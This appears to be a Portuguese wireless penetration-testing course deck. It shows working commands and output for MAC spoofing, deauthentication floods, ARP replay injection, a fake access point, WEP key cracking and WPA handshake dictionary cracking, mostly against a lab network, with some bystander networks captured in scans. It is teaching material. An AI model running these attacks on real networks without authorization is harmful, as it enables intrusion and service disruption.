Clavis Teste de Invasao Sem Fio EAD

Teste de Invasão em Redes Sem Fio

Nelson Murilo Clavis Segurança da Informação

$ whoami

•  Consultor Infosec •  2 livros publicados

•  Pentester

•  Investigador Forense

•  Incident Handler

•  Instrutor e Palestrante

Contatos

[email protected] nelson.murilo @nelsonmurilo

Modelo do Curso

•  Aulas ao vivo (on line) •  Aulas gravadas para revisão

•  Ambientes para testes

•  Material complementar

•  Avaliação

Agenda

•  Introdução

•  Conceitos de redes Wi-Fi

•  Principais vulnerabilidades

•  Ferramentas atuais

•  Sondagem e mapeamento

•  Identificação do ambiente

•  Ataques

•  Finalizando

Introdução

•  Conceitos

•  Características

§  Wi-Fi §  Bluetooth §  Infravermelho §  WiMax §  RFID §  Celular (GSM/TDMA/CDMA, etc.) §  ZigBee (802.15.4) §  UWB (802.15.3)

Redes sem fio

IEEE 802.11 Padrões atuais:

802.11b 11Mb 2.4Ghz 802.11a 54Mb 5.1GHz 802.11g 54Mb 2.4Ghz 802.11i - Mecanismos de segurança 802.1x – Mecanismos de autenticação, uso em

redes cabeadas e sem fio 802.11n – Aumento da velocidade, 108Mb

nominais.

# dmesg | grep phy [ 0.000000] BIOS-provided physical RAM map: [ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht' [ 84.913969] Registered led device: rt2800usb-phy0::radio [ 84.913999] Registered led device: rt2800usb-phy0::assoc [ 84.914026] Registered led device: rt2800usb-phy0::quality

# iwconfig lo no wireless extensions. wlan4 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on eth4 no wireless extensions.

Canais

Channel 36 : 5.18 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 64 : 5.32 GHz Channel 149 : 5.745 GHz Channel 153 : 5.765 GHz Channel 157 : 5.785 GHz Channel 161 : 5.805 GHz Channel 165 : 5.825 GHz

$ iwlist wlan0 freq wlan0 24 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz

Canais

Ad-Hoc

Infraestrutura

((( Nome da rede )))

Infraestrutura

Infraestrutura

Divulgação do nome da rede

# iwlist wlan0 scan | egrep "Address|ESSID" [...]

Cell 05 -‐ Address: 7C:4F:B5:E4:CC:80 ESSID:"GVT-‐CC81" Cell 06 -‐ Address: 00:07:40:4D:1A:5C ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00" Cell 07 -‐ Address: 6C:2E:85:F3:0C:8B ESSID:"GVT-‐0C87"


23:05:16.386193 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11 23:05:16.488612 Beacon () [1.0 2.0 5.5 11.0 6.0 12.0 24.0 36.0 Mbit] ESS CH: 11 23:05:17.321039 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3 23:05:17.629271 Beacon (Homenet54) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 3


09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11] 09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11] 09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown) Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]

00:07:40:4D:1A:5C


09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]


WPA-PSK (Pre-shared Key)

WPA - Enterprise

RADIUS

WPA - Enterprise

RADIUS

/etc/password

/etc/raddb/users

Oracle/MySQL/etc

Cer_ficado Digital

Biometria

Conceitos iniciais

$ /sbin/ifconfig wlan0 wlan0 Link encap:Ethernet HWaddr 00:21:29:65:b8:45 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

# tcpdump -vv -c 3 -i wlan0 tcpdump: listening on wlan0, link-‐type EN10MB (Ethernet), capture size 65535 bytes 14:00:37.291962 IP (tos 0x0, hl 64, id 0, offset 0, flags [DF], proto ICMP (1), length 84) 192.168.11.2 > air: ICMP echo request, id 30507, seq 9, length 64 14:00:37.292417 IP (tos 0x0, hl 64, id 8024, offset 0, flags [DF], proto UDP (17), length 71) 192.168.11.2.49351 > air: [udp sum ok] 2302+ PTR? 1.11.168.192.in-‐addr.arpa. (43) 14:00:37.294831 IP (tos 0x0, hl 255, id 49706, offset 0, flags [none], proto ICMP (1), length 84) air > 192.168.11.2: ICMP echo reply, id 30507, seq 9, length 64 3 packets captured

Modo promiscuo

Modo promiscuo

# iwconfig wlan0 wlan0 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-‐Associated Tx-‐Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryp_on key:off Power Management:on

# iw wlan0 info Interface wlan0

ifindex 32 type managed

# iw dev wlan0 interface add mon0 type monitor

Modo Monitor

# iwconfig wlan0 mode monitor

Modo Monitor

# iwconfig mon0 mon0 IEEE 802.11bg Mode:Monitor Tx-‐Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on

# iw mon0 info Interface mon0

ifindex 35 type monitor

Modo monitor

# tcpdump -c 3 -i mon0 -vv tcpdump: WARNING: mon0: no IPv4 address assigned tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes 14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1, PRIVACY[|802.11] 14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP Encrypted 0us Data IV:5b5 Pad 20 KeyID 2 14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP Encrypted 44us Data IV:4104 Pad 20 KeyID 0 3 packets captured

Seleção de canais

# iwconfig mon0 channel 11 # iwconfig mon0 mon0 IEEE 802.11bg Mode:Monitor Frequency:2.462 GHz Tx-‐Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:on

Seleção de canais

# tcpdump -c 3 -i mon0 -vv tcpdump: WARNING: mon0: no IPv4 address assigned tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 65535 bytes 14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11] 14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[ |802.11] 14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[ |802.11] 3 packets captured

Identificação de APs

CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca BSSID STATION PWR Rate Lost Frames Probe 00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1 00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1


grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt 00-25-9C (hex) Cisco-Linksys, LLC

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca


Análise do tráfego tshark -r Kismet-20120309-04-23-25-1.pcapdump 6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request) 6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1 9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1 9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1 10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR


Análise do tráfego

iwconfig wlan5 wlan5 IEEE 802.11abgn ESSID:"bsbca" Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on

iwconfig wlan5 essid bsbca

Filtro de MAC

Filtro de MAC

OpenBSD/NetBSD # wiconfig wi0 -m 00:00:00:00:00:01

Linux # ifconfig ath0 hw ether 00:00:00:00:00:01

FreeBSD # ifconfig xl3 ether 00:00:00:00:00:01

Mac OSX # ifconfig en0 ether 00:00:00:00:00:01

Filtro de MAC

Wired Equivalent Privacy


•  Protocolo frágil

•  Quebra exige captura de grande número de pacotes (+5mil)

•  Ou por dicionário

•  Várias ferramentas disponíveis


CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS BSSID STATION PWR Rate Lost Frames Probe 00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS

logtypes=pcapdump,gpsxml,netxml,nehxt,alert

/usr/local/etc/kismet.conf

gps=true

preferredchannels=1,6,11

allowplugins=true

$ ls -‐lh Kismet* -‐rw-‐r-‐-‐r-‐-‐ 1 root root 8.0M 2012-‐02-‐20 14:04 Kismet-‐20120220-‐13-‐47-‐37-‐1.pcapdump

hhp://blog.kismetwireless.net/

Suite formada de vários programas •  Análise de tráfego

•  Quebra de chave WEP (vários _pos de ataques)

•  Injeção de pacotes

•  Quebra de chave WPA(2)-‐PSK usando dicionário

•  Criação de Access Point falso

Sequência comum •  Airmon-‐ng: Coloca a interface em modo monitor

•  Airodump-‐ng: Visualização e captura de pacotes

•  Aircrack-‐ng: Quebra da chave WEP

# airmon-ng Interface Chipset Driver wlan5 Ralink RT2870/3070 rt2800usb - [phy48]


# airmon-ng start wlan5 Interface Chipset Driver wlan2 Realtek RTL8187L rtl8187 - [phy51]

(monitor mode enabled on mon0)


# airmon-ng start wlan5 Interface Chipset Driver wlan2 Realtek RTL8187L rtl8187 - [phy51]


# airmon-ng start wlan5 11 Interface Chipset Driver wlan2 Realtek RTL8187L rtl8187 - [phy51]


Airodump-‐ng

# airodump-ng wlan0 ioctl(SIOCSIWMODE) failed: Device or resource busy ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211, ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run 'airmon-ng start wlan0 <#>' Sysfs injection support was not found either.

Airodump-‐ng

# airodump-ng mon0

CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS BSSID STATION PWR Rate Lost Frames Probe 00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 - 1 3 9 LABVIRUS

Aircrack-‐ng

$ aircrack-ng labvirus-01.pcap [00:00:05] Tested 633 keys (got 46103 IVs) KB depth byte(vote) 0 2/ 4 14(55552) 13(54528) 3C(53504) 98(53504) 24(53248) 1 2/ 1 DE(54784) 92(54528) 06(52992) 7D(52736) 02(52480) 2 1/ 3 82(56576) 18(54272) 45(53760) CD(53504) FC(53248) 3 1/ 3 09(57600) 08(55808) 41(55040) C9(54016) 8E(52992) 4 51/ 4 A1(48640) 83(48384) 86(48384) 99(48384) B2(48384) KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: naoxxxxxxxx )

Decrypted correctly: 100%

Aireplay-‐ng

# aireplay-ng --test mon0 17:33:50 Trying broadcast probe requests... 17:33:50 Injection is working! 17:33:52 Found 1 AP 17:33:52 Trying directed probe requests... 17:33:52 00:25:9C:36:0A:EF - channel: 11 – LABVIRUS' 17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73 17:33:52 30/30: 100%

Aireplay-‐ng

# aireplay-ng --arpreplay –h mac_cliente –e ESSID interface

# arp –an # # ping -c 1 192.168.11.1

PING 192.168.11.1 (192.168.11.1) 56(84) bytes of data.

64 bytes from 192.168.11.1: icmp_seq=1 ttl=255 time=54.9 ms

--- 192.168.11.1 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 54.973/54.973/54.973/0.000 ms

# arp –an (192.168.11.1) at 00:07:40:35:a1:18 [ether] on wlan0

Aireplay-‐ng

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS BSSID STATION PWR Rate Lost Frames Probe 00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS

Aireplay-‐ng


aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0 The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether 00:21:29:65:B8:45 17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11 Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS". Saving ARP requests in replay_arp-0221-174410.cap You should also start airodump-ng to capture replies. Notice: got a deauth/disassoc packet. Is the source MAC associated ? Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)

Aireplay-‐ng


aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0 The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).

ifconfig mon0 hw ether 00:21:29:65:B8:45 17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11 Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS". Saving ARP requests in replay_arp-0221-174410.cap You should also start airodump-ng to capture replies. Notice: got a deauth/disassoc packet. Is the source MAC associated ? Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)

CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS BSSID STATION PWR Rate Lost Frames Probe 00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS

Aireplay-‐ng

# airmon-ng start wlan5 11 Interface Chipset Driver wlan2 Realtek RTL8187L rtl8187 - [phy51]


# airodump-ng -c 11 mon0

Aireplay-‐ng

•  Esperar uma nova conexão

•  Forçar uma desconexão aireplay-ng --deauth 100 –h MAC_CLIENTE –e ESSID mon0

ivstools-‐ng

Aircrack-ng 1.1 r2076

[00:00:02] Tested 132441 keys (got 2448 IVs)

KB depth byte(vote) 0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584) 1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072) 2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072) 3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096) 4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840) Failed. Next try with 5000 IVs.

Aircrack-ng 1.1 r2076

[00:00:03] Tested 163521 keys (got 7120 IVs)

KB depth byte(vote) 0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728) 1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28) 2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8) 3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84) 4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8) Failed. Next try with 10000 IVs.

ivstools-‐ng

ivstools-‐ng

for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done Opening poucosivs-01.cap Creating poucosivs-01.cap.ivs Read 18995 packets. Written 2448 IVs. Opening poucosivs-03.cap Creating poucosivs-03.cap.ivs Read 551433 packets. Written 30547 IVs. Opening poucosivs-04.cap Creating poucosivs-04.cap.ivs Read 129917 packets. Written 13092 IVs.

ivstools-‐ng

ivstools --merge *.ivs poucostotal.ivs Creating poucostotal.ivs Opening poucosivs-01.cap.ivs 334818 bytes written Opening poucosivs-03.cap.ivs 4524402 bytes written Opening poucosivs-04.cap.ivs 6319236 bytes written

# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap

Opening poucosivs-01.cap Opening poucosivs-02.cap Opening poucosivs-03.cap Opening poucosivs-04.cap Read 689344 packets. # BSSID ESSID Encryption 1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)

ivstools-‐ng

# tcpdump -vvv -n -r labvirus-01.cap 16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11] 16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c 16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c 16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e 16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c 16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c 16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c 16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c 16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c


# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap Total number of packets read 298278 Total number of WEP data packets 162412 Total number of WPA data packets 0 Number of plaintext data packets 0 Number of decrypted WEP packets 108781 Number of corrupted WEP packets 0 Number of decrypted WPA packets 0


# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap Total number of packets read 298278 Total number of WEP data packets 162412 Total number of WPA data packets 0 Number of plaintext data packets 0 Number of decrypted WEP packets 108781 Number of corrupted WEP packets 0 Number of decrypted WPA packets 0

16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272 16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335 16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327 16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272 16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311 16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343 16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272 16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331 16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337 16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325 16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331 16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2 9:65:b8:45 (oui Unknown), length 300 16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300 16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2 9:65:b8:45 (oui Unknown), length 300

CH 11 ][ Elapsed: 4 s ][ 2012-‐02-‐27 21:14 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 2E:74:C2:BA:A5:8A -‐87 2 0 0 3 54e WPA2 CCMP PSK iPhone de Marcelo 00:25:9C:36:0A:EF -‐45 3 0 0 1 54 WPA2 CCMP PSK Homenet54 BSSID STATION PWR Rate Lost Frames Probe (not associated) 00:1B:77:7C:2C:A7 -‐86 0 -‐ 1 68 8 Notebook (not associated) 00:21:29:65:B8:45 -‐47 0 -‐ 1 7 2 LABVIRUS

CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W 00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys 74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS 00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal BSSID STATION PWR Rate Lost Frames Probe (not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W



# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0 09:57:07 Created tap interface at0 09:57:07 Trying to set MTU on at0 to 1500 09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started. 09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7 09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7 09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS" 09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS” 09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key) 09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes) 09:57:10 SKA from E0:F8:47:C3:30:14 09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS" 09:57:10 Ignored IPv6 packet. 09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps. 09:57:10 Added ARP packet to cfrag buffer.


# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0 # aircrack-ng cafe-latte-01.cap Aircrack-ng 1.1 r2076 [00:00:00] Tested 798 keys (got 38085 IVs) KB depth byte(vote) 0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288) 1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800) 2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472) 3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752) 4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800) KEY FOUND! [ 6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX:XX] (ASCII: naoxxxxxxxxxxx )

Decrypted correctly: 100%

AP sem clientes

Migration WPA-WEP

WPA

CH 5 ][ Elapsed: 3 mins ][ 2012-02-22 05:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:26:CB:11:5F:30 -64 66 1 0 11 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:B9:23:40 -77 68 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:C4:BD:90 -81 66 0 0 6 54e. WPA2 CCMP MGT 88200Wireless-d 94:0C:6D:BB:2C:94 -89 23 0 0 6 11 . WPA2 CCMP PSK Testeee 00:14:D1:C7:BD:00 -90 51 7 0 11 54e OPN AER 5 andar 00:26:CB:B9:24:C0 -82 17 0 0 1 54e. WPA2 CCMP MGT 88200Wireless-d 00:26:CB:C4:BA:00 -90 9 0 0 11 54e. WPA2 CCMP MGT 88200Wireless-d

aircrack-‐ng labvirus_wpa-‐01.cap Opening labvirus_wpa-‐01.cap Read 254839 packets. # BSSID ESSID Encryp_on 1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)

airodump-ng -w labvirus_wpa -c 11 --bssid 00:07:40:4D:1a:5c mon0

CH 11 ][ Elapsed: 12 s ][ 2012-03-01 14:06 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:07:40:4D:1A:5C -45 61 76 25 1 11 54 WPA CCMP PSK LABVIRUS BSSID STATION PWR Rate Lost Frames Probe 00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26

aircrack-ng labvirus_wpa-01.cap Opening labvirus_wpa-01.cap Read 254839 packets. # BSSID ESSID Encryption 1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)

aircrack-ng labvirus_wpa-01.cap Opening labvirus_wpa-01.cap Read 698 packets. # BSSID ESSID Encryption 1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake) Choosing first network as target. Opening labvirus_wpa-01.cap Please specify a dictionary (option -w).

tshark -r dlink-01.cap -R eapol

39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)

39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)

39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)

39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)

arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0 08:49:22 Wai_ng for beacon frame (ESSID: dlink) on channel 6 Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink". 08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]

arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0 08:49:22 Wai_ng for beacon frame (ESSID: dlink) on channel 6 Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink". 08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf

Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz) Associated with 00:1b:11:50:2f:2e WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP] CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=] CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys

arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0 08:49:22 Wai_ng for beacon frame (ESSID: dlink) on channel 6 Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink". 08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs] wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf

Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz) Associated with 00:1b:11:50:2f:2e WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP] CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=] CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys aircrack-ng dlink-01.cap

Opening dlink-01.cap Read 60093 packets. # BSSID ESSID Encryption 1 00:1B:11:50:2F:2E dlink WPA (1 handshake)

Aircrack-ng 1.1 [00:01:09] 88192 keys tested (1274.66 k/s) KEY FOUND! [ pxxxxxxxxxxxxxxxx ] Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4 Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09 57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57 A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC 01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3 EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2 real 1m9.538s user 4m18.786s sys 0m0.629s

